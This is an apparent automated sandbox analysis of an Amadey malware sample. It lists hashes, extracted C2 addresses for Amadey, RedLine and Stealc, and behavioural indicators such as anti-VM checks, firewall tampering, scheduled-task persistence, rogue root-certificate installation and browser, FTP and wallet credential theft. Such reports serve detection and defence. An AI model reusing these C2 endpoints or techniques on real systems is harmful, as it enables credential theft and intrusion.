amadey | a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed

Analysis

max time kernel
90s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
11-05-2024 23:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
Size

1.8MB
MD5

d597abaf1f2036dd546216a7af8f35f1
SHA1

4e42175a05a4555e5173e587b979622d3ee50a29
SHA256

a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed
SHA512

c7384d8882d1f2ef4009f9d97e849bf0ae6efa5103f22086ae66cd84a58abdfdf6cb1f73ea374ad3909803af2669398b5e30bdab90cf0b14a402a2edb3af5a6b
SSDEEP

49152:WjaHFEtbzeDa23UnnW8A8xQT611FXlgbUsDd:W8FCbq223WW8pY21Zl4UsDd

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral2/memory/4344-512-0x0000000000450000-0x0000000000697000-memory.dmp	family_vidar_v7
behavioral2/memory/4344-511-0x0000000000450000-0x0000000000697000-memory.dmp	family_vidar_v7

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral2/memory/4812-38-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000100000002a9d2-46.dat	family_zgrat_v1
behavioral2/memory/5040-72-0x0000000000080000-0x0000000000140000-memory.dmp	family_zgrat_v1
behavioral2/memory/3588-915-0x000002127E410000-0x0000021281C44000-memory.dmp	family_zgrat_v1
behavioral2/memory/3588-920-0x000002121A870000-0x000002121A894000-memory.dmp	family_zgrat_v1
behavioral2/memory/3588-916-0x000002121A760000-0x000002121A86A000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral2/memory/2200-652-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/1844-696-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	EnxMjaGe1nUlFa0LkVF2BNXh.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/files/0x000100000002a9d1-51.dat	family_redline
behavioral2/files/0x000100000002a9d2-46.dat	family_redline
behavioral2/memory/3504-60-0x0000000000F90000-0x0000000000FE2000-memory.dmp	family_redline
behavioral2/memory/5040-72-0x0000000000080000-0x0000000000140000-memory.dmp	family_redline
behavioral2/files/0x000200000002a9d9-112.dat	family_redline
behavioral2/memory/2684-126-0x00000000005F0000-0x0000000000642000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral2/files/0x000100000002a9e6-356.dat	family_xmrig
behavioral2/files/0x000100000002a9e6-356.dat	xmrig
behavioral2/files/0x000200000002a9d1-361.dat	family_xmrig
behavioral2/files/0x000200000002a9d1-361.dat	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5244	powershell.exe
1508	powershell.exe
1988	powershell.exe
5600	powershell.exe
5264	powershell.EXE
4496	powershell.exe
2852	powershell.exe
2376	powershell.exe
5828	powershell.exe
1676	powershell.exe
484	powershell.exe
1084	powershell.exe
5496	powershell.exe
5456	powershell.exe
5900	powershell.exe
2696	powershell.exe
1972	powershell.exe
3952	powershell.exe
5504	powershell.exe
5920	powershell.exe
2476	powershell.exe
3192	powershell.exe
4796	powershell.exe
3424	powershell.exe
5340	powershell.exe
5160	powershell.exe
5804	powershell.exe
2524	powershell.exe
5432	powershell.exe
4580	powershell.exe
5180	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5152	netsh.exe
5908	netsh.exe
5428	netsh.exe
1728	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L7y7E2NjBG7TQQLQALVnFCku.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G8t9341hQ69T3egC5XkNOMHr.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6XwQ9y2GInbNRnX2UYWrcIkt.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eUhG8ldW7tuEInc8Lbs6v1aY.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1TJPbzoqGx0s4mjyQOdhymEL.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vuApusaEqH3LhZOhHIsx20Ng.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VrXBIgeTj0UyS70IcJTFTTsQ.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IdgIVmjuQB6ddRLgrwURQyWO.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lgWawhW1PPl4DLU6hrq6ZfXT.bat	jsc.exe

Executes dropped EXE 46 IoCs

pid	Process
4908	axplons.exe
688	alex.exe
3504	keks.exe
5040	trf.exe
2624	gold.exe
2684	redline1.exe
2712	install.exe
2908	GameService.exe
4344	GameService.exe
4476	GameService.exe
448	GameService.exe
4756	GameService.exe
2816	GameSyncLink.exe
3688	771546.exe
932	swizzhis.exe
3968	GameService.exe
4120	lumma1.exe
1676	GameService.exe
4068	GameService.exe
2672	GameService.exe
3956	GameService.exe
2704	PiercingNetLink.exe
4684	GameService.exe
2264	GameService.exe
3288	GameService.exe
1232	GameService.exe
3092	GameSyncLinks.exe
4128	352215.exe
1496	enpl.exe
4344	Aviation.pif
3280	file300un.exe
2360	axplons.exe
3924	ch6NfDG23wRpIy0nQE4DQJ8G.exe
2200	A6DKueHXjjxUYRAziL7FqPpC.exe
1844	m2XuA52sgzrsftqWhQ5bXFma.exe
576	gkSJH90QqERNt5aMa7NSzabo.exe
4564	i6MGymcYksQfAd4CKWJ8PM9d.exe
3728	EnxMjaGe1nUlFa0LkVF2BNXh.exe
4700	ijPv92NuvmTmjpzXwJEip2cb.exe
2660	RqgysBkM4Ft0xGnTXKGeuJca.exe
1812	Install.exe
2204	Install.exe
2328	u310.0.exe
1624	u310.1.exe
5180	Install.exe
5872	Install.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	axplons.exe

Loads dropped DLL 5 IoCs

pid	Process
3688	771546.exe
3728	RegAsm.exe
3728	RegAsm.exe
2328	u310.0.exe
2328	u310.0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
7	bitbucket.org
7	pastebin.com
31	bitbucket.org
41	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	api.myip.com
62	ipinfo.io
68	api.myip.com
69	ipinfo.io

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	EnxMjaGe1nUlFa0LkVF2BNXh.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	EnxMjaGe1nUlFa0LkVF2BNXh.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	EnxMjaGe1nUlFa0LkVF2BNXh.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	EnxMjaGe1nUlFa0LkVF2BNXh.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
232	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
4908	axplons.exe
2360	axplons.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 688 set thread context of 4812	688	alex.exe	83
PID 2624 set thread context of 2872	2624	gold.exe	94
PID 932 set thread context of 3728	932	swizzhis.exe	112
PID 4120 set thread context of 4736	4120	lumma1.exe	121
PID 1084 set thread context of 3628	1084	powershell.exe	163

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\axplons.job	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2784	sc.exe
1512	sc.exe
2720	sc.exe
2992	sc.exe
4672	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2456	688	WerFault.exe	82
2740	4344	WerFault.exe	154
4920	4344	WerFault.exe	154
1924	3924	WerFault.exe	166

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u310.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u310.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u310.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u310.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u310.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe

Creates scheduled task(s) 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2068	schtasks.exe
3624	schtasks.exe
5984	schtasks.exe
5800	schtasks.exe
4952	schtasks.exe
5392	schtasks.exe
5944	schtasks.exe
6108	schtasks.exe
5816	schtasks.exe
2960	schtasks.exe
1456	schtasks.exe
5508	schtasks.exe
4796	schtasks.exe
5040	schtasks.exe
2908	schtasks.exe
3988	schtasks.exe
1752	schtasks.exe
2740	schtasks.exe
2820	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
1520	tasklist.exe
2200	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 58 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309ddb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3688	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
232	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
232	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
4908	axplons.exe
4908	axplons.exe
3728	RegAsm.exe
3728	RegAsm.exe
3504	keks.exe
3504	keks.exe
5040	trf.exe
5040	trf.exe
3504	keks.exe
3504	keks.exe
3504	keks.exe
3504	keks.exe
2684	redline1.exe
2684	redline1.exe
3728	RegAsm.exe
3728	RegAsm.exe
2684	redline1.exe
2684	redline1.exe
2684	redline1.exe
2684	redline1.exe
4344	Aviation.pif
4344	Aviation.pif
4344	Aviation.pif
4344	Aviation.pif
4344	Aviation.pif
4344	Aviation.pif
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
2360	axplons.exe
2360	axplons.exe
2328	u310.0.exe
2328	u310.0.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
2376	powershell.exe
2376	powershell.exe
2376	powershell.exe
5600	powershell.exe
5600	powershell.exe
5600	powershell.exe
5828	powershell.exe
5828	powershell.exe
5828	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
3952	powershell.exe
3952	powershell.exe
3424	powershell.exe
3424	powershell.exe
5496	powershell.exe
5496	powershell.exe
5456	powershell.exe
5456	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5040	trf.exe
Token: SeBackupPrivilege	5040	trf.exe
Token: SeSecurityPrivilege	5040	trf.exe
Token: SeSecurityPrivilege	5040	trf.exe
Token: SeSecurityPrivilege	5040	trf.exe
Token: SeSecurityPrivilege	5040	trf.exe
Token: SeDebugPrivilege	3504	keks.exe
Token: SeDebugPrivilege	2684	redline1.exe
Token: SeDebugPrivilege	4812	RegAsm.exe
Token: SeLockMemoryPrivilege	4128	352215.exe
Token: SeDebugPrivilege	1520	tasklist.exe
